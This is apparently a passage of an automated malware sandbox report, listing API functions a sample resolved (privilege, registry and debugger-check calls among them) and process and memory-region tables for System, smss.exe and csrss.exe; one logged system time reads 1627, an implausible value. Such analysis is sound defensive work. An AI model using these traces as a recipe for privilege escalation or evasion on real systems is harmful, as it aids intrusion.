| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-12 16:14:35 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #55: System
0
0
| Information | Value |
|---|---|
| ID | #55 |
| File Name | System |
| Command Line | - |
| Initial Working Directory | - |
| Monitor | Start Time: 00:02:14, Reason: Created Daemon |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4 |
| Parent PID | 0x10c (c:\windows\system32\smss.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
204
0x
504
0x
FB4
0x
D00
0x
C40
0x
3A8
0x
E20
0x
700
0x
2C
0x
FDC
0x
28
0x
1C
0x
13C
0x
5DC
0x
B54
0x
4D8
0x
AE8
0x
ACC
0x
C04
0x
5C8
0x
C08
0x
FFC
0x
FF8
0x
FF4
0x
FF0
0x
FEC
0x
FE8
0x
FE4
0x
FE0
0x
D4
0x
D0
0x
B4
0x
EC
0x
5DC
0x
80
0x
CC
0x
2D8
0x
8C8
0x
2DC
0x
568
0x
30
0x
640
0x
190
0x
564
0x
318
0x
87C
0x
888
0x
0
0x
BFC
0x
BF0
0x
BEC
0x
BE8
0x
B78
0x
B6C
0x
38
0x
99C
0x
990
0x
10
0x
900
0x
8E0
0x
8B8
0x
8B0
0x
6B4
0x
5FC
0x
6C
0x
E8
0x
C8
0x
664
0x
63C
0x
638
0x
624
0x
5EC
0x
59C
0x
58C
0x
584
0x
48
0x
178
0x
17C
0x
4DC
0x
4C0
0x
B0
0x
480
0x
474
0x
8C
0x
144
0x
74
0x
148
0x
358
0x
3C
0x
2C4
0x
84
0x
70
0x
14C
0x
44
0x
14
0x
64
0x
78
0x
1B4
0x
108
0x
180
0x
174
0x
170
0x
168
0x
20
0x
144
0x
12C
0x
7C
0x
F4
0x
34
0x
A8
0x
128
0x
124
0x
C4
0x
A4
0x
BC
0x
60
0x
114
0x
B8
0x
88
0x
C0
0x
F0
0x
8
0x
18
0x
D48
0x
A58
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000006180000000 | 0x6180000000 | 0x6180000fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000006180010000 | 0x6180010000 | 0x6180010fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000006180020000 | 0x6180020000 | 0x6180020fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000006180030000 | 0x6180030000 | 0x618004ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180050000 | 0x6180050000 | 0x618006ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180070000 | 0x6180070000 | 0x618008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180090000 | 0x6180090000 | 0x61800affff | Private Memory | rw |
|
|
|
- |
| private_0x00000061800b0000 | 0x61800b0000 | 0x61800cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000061800d0000 | 0x61800d0000 | 0x61800effff | Private Memory | rw |
|
|
|
- |
| private_0x00000061800f0000 | 0x61800f0000 | 0x618010ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180110000 | 0x6180110000 | 0x618012ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180130000 | 0x6180130000 | 0x618014ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180150000 | 0x6180150000 | 0x618016ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180170000 | 0x6180170000 | 0x618018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180190000 | 0x6180190000 | 0x61801affff | Private Memory | rw |
|
|
|
- |
| private_0x00000061801b0000 | 0x61801b0000 | 0x61801cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000061801d0000 | 0x61801d0000 | 0x61801effff | Private Memory | rw |
|
|
|
- |
| private_0x00000061801f0000 | 0x61801f0000 | 0x618020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180210000 | 0x6180210000 | 0x618022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180230000 | 0x6180230000 | 0x618024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180250000 | 0x6180250000 | 0x618026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180270000 | 0x6180270000 | 0x618028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180290000 | 0x6180290000 | 0x61802affff | Private Memory | rw |
|
|
|
- |
| private_0x00000061802b0000 | 0x61802b0000 | 0x61802cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000061802d0000 | 0x61802d0000 | 0x61802effff | Private Memory | rw |
|
|
|
- |
| private_0x00000061802f0000 | 0x61802f0000 | 0x618030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180310000 | 0x6180310000 | 0x618032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180330000 | 0x6180330000 | 0x618034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180350000 | 0x6180350000 | 0x618036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180370000 | 0x6180370000 | 0x618038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180390000 | 0x6180390000 | 0x61803affff | Private Memory | rw |
|
|
|
- |
| private_0x00000061803b0000 | 0x61803b0000 | 0x61803cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000061803d0000 | 0x61803d0000 | 0x61803effff | Private Memory | rw |
|
|
|
- |
| private_0x00000061803f0000 | 0x61803f0000 | 0x618040ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180410000 | 0x6180410000 | 0x618042ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180430000 | 0x6180430000 | 0x618044ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180450000 | 0x6180450000 | 0x618046ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180470000 | 0x6180470000 | 0x618048ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180490000 | 0x6180490000 | 0x61804affff | Private Memory | rw |
|
|
|
- |
| private_0x00000061804b0000 | 0x61804b0000 | 0x61804cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000061804d0000 | 0x61804d0000 | 0x61804effff | Private Memory | rw |
|
|
|
- |
| private_0x00000061804f0000 | 0x61804f0000 | 0x618050ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006180510000 | 0x6180510000 | 0x618052ffff | Private Memory | rw |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #56: smss.exe
0
0
| Information | Value |
|---|---|
| ID | #56 |
| File Name | c:\windows\system32\smss.exe |
| Command Line | \SystemRoot\System32\smss.exe |
| Initial Working Directory | C:\Windows |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x10c |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
2B0
0x
118
0x
110
|
Process #57: csrss.exe
0
0
| Information | Value |
|---|---|
| ID | #57 |
| File Name | c:\windows\system32\csrss.exe |
| Command Line | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x158 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
4CC
0x
348
0x
1E0
0x
1DC
0x
1AC
0x
18C
0x
188
0x
184
0x
164
0x
160
0x
15C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| locale.nls | 0xac80000000 | 0xac800bdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ac800c0000 | 0xac800c0000 | 0xac80240fff | Pagefile Backed Memory | r |
|
|
|
- |
| csrss.exe.mui | 0xaca0300000 | 0xaca0300fff | Memory Mapped File | r |
|
|
|
- |
| winsrv.dll.mui | 0xaca0310000 | 0xaca0311fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000aca0320000 | 0xaca0320000 | 0xaca0333fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000aca0340000 | 0xaca0340000 | 0xaca034ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| marlett.ttf | 0xaca0350000 | 0xaca0356fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000aca0360000 | 0xaca0360000 | 0xaca0377fff | Pagefile Backed Memory | r |
|
|
|
- |
| vgaoem.fon | 0xaca0380000 | 0xaca0381fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000aca0390000 | 0xaca0390000 | 0xaca0390fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca0390000 | 0xaca0390000 | 0xaca039ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca03a0000 | 0xaca03a0000 | 0xaca03affff | Pagefile Backed Memory | rw |
|
|
|
- |
| dosapp.fon | 0xaca03b0000 | 0xaca03b8fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000aca03c0000 | 0xaca03c0000 | 0xaca03fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000aca0400000 | 0xaca0400000 | 0xaca0400fff | Private Memory | rw |
|
|
|
- |
| vgasys.fon | 0xaca0410000 | 0xaca0411fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000aca0420000 | 0xaca0420000 | 0xaca045ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000aca0460000 | 0xaca0460000 | 0xaca0466fff | Private Memory | rw |
|
|
|
- |
| private_0x000000aca0470000 | 0xaca0470000 | 0xaca04affff | Private Memory | rw |
|
|
|
- |
| private_0x000000aca04b0000 | 0xaca04b0000 | 0xaca04effff | Private Memory | rw |
|
|
|
- |
| private_0x000000aca04f0000 | 0xaca04f0000 | 0xaca04f0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000aca0500000 | 0xaca0500000 | 0xaca05fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000aca0600000 | 0xaca0600000 | 0xaca0787fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000aca0790000 | 0xaca0790000 | 0xaca07cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000aca07d0000 | 0xaca07d0000 | 0xaca080ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000aca0810000 | 0xaca0810000 | 0xaca084ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0xaca0850000 | 0xaca092efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000aca0930000 | 0xaca0930000 | 0xaca095ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000aca0960000 | 0xaca0960000 | 0xaca1d5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000aca1d60000 | 0xaca1d60000 | 0xaca1d60fff | Private Memory | rw |
|
|
|
- |
| private_0x000000aca1d70000 | 0xaca1d70000 | 0xaca1d70fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000aca1d80000 | 0xaca1d80000 | 0xaca1d8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca1d90000 | 0xaca1d90000 | 0xaca1d9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca1da0000 | 0xaca1da0000 | 0xaca1daffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca1db0000 | 0xaca1db0000 | 0xaca1dbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca1dc0000 | 0xaca1dc0000 | 0xaca1dcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000aca1dd0000 | 0xaca1dd0000 | 0xaca1e0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000aca1e10000 | 0xaca1e10000 | 0xaca1ecffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000aca1ed0000 | 0xaca1ed0000 | 0xaca1edffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca1ee0000 | 0xaca1ee0000 | 0xaca1f9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000aca1fa0000 | 0xaca1fa0000 | 0xaca1faffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000aca1fb0000 | 0xaca1fb0000 | 0xaca1fbffff | Pagefile Backed Memory | rw |
|
|
|
- |
